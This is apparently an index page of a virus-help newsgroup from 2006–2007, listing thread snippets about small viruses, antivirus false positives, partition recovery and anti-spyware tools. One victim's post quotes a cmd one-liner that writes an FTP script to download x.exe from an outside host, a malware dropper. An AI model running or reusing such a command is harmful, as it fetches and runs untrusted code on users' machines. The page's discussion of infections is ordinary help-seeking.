First  |  Prev |  Next  |  Last
Pages: 9 10 11 12 13 14 15 16 17 18 19 20
smallest virus?
Hi, Anybody know which is the smallest computer virus out there? I've googled and yahood but nothing. so far it seems maybe trivialow.13 is the smallest (at 13 bytes) but can't find any info about it. I seem to remember a few years ago the smallest was around 35 bytes but don't remember the name. Anybody have an... 11 Sep 2007 03:44
VIRUS ATTACK FIX TO RECOVER LOST DATA ON THE H.D.
IF YOU EVER HAD YOUR HARD DRIVE PARTITION DELETED BY A VIRUS ATTACK USING RAPIDSHARE OR MEGAUPLOAD PATCHES THEN HERE A WAY TO RECOVER YOUR LOST PARTITION WITHOUT LOOSING ANY OF THE DATA ON THE HARD DRIVE AND BRING BACK WIN XP TO YOUR PC. MY TEST DISK (Size 5Mb) DOWNLOAD LINK: http://rapidshare.com/files/47316877... 12 Aug 2007 17:43
Superantivirus?
My laptop running WXPHome pretty much died. McAfee was turned off and would do anything. After running in safe mode Spybot and Ad-Aware, each of which found dozens of problems, I was able to run McAfee, which found dozens more. I thought I was okay, but when I rebooted in normal mode McAfee said it detected !... 25 Jul 2007 16:59
Is ole16.dll a virus?
I have been using mcafee virusscan on three computers. Suddenly yesterday (6/19/07), all three computer prompted a virus warning saying that ole16.dll is a virus. Win32/Saburex.dll virus File Path: C;\Windows\System32\ole16.dll But McCafee couldn't delete or ignore. I believe that ole16.dll is n... 12 Jul 2007 07:52
Windows virus on my mac?
Hi all, I was working in an excel document, when I noticed that the selected cell was moving itself. Then suddenly, one letter at a time, this line typed itself in: cmd /c echo open www.powersofthosting.com 21 >> ik &echo user mainston powersoft >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik ... 11 Mar 2007 12:20
Warning: Spyerase intentionally erases BugHunter from your machine
David H. Lipman wrote: From: "4Q" <paul_zest(a)hushmail.com> | | See Raid this is why you need to release Bughunter as Opensource and | your peers can vouch for your integrity. | | 4Q BugHunter is clean of malware and does not exibit any form of exploitation. It's so nice to see one of Du... 20 Feb 2007 01:36
RMD sarcaxxo
Does anyone know of a virus/trojan/worm that automates ftp login attempts as administrator and if access is gained attempts to delete a directory named "sarcaxxo"? I can find several examples of it happening in logs posted on the internet but no one seems to know why that particular directory is being targeted. ... 1 Feb 2007 09:36
Avira Manual Update Failure
Sorry about posting this here but am having difficulty posting in the Avira Forum. I have used the Avira Free version for 2 years now and always used the server for Definition Updates. Been away from home for a while so decided to download the vdf from the Avira site making sure that I got the Unicode versi... 6 Jan 2007 13:42
Spyerase
My new tool in the fight against Spyware/malware is a detection and removal utility to clean computers with the Windows 2000/XP operating system that are infected with fake security warnings caused by Smitfraud and it's many variants. Spyerase now has 1100+ signatures to remove all variants of Smitfraud listed ... 2 Oct 2006 01:06
AVG Email Scanner contacting strange IP address
I use hotmail only, I have Outlook installed on this computer but it's never been run, and its not in my task manager that I can see. I've triple virus scanned this system w/ different programs, also I run Ad-Aware and Spybot and a few other forms of protection. ....With that said, anyone have any thoughts on wh... 22 Sep 2006 22:14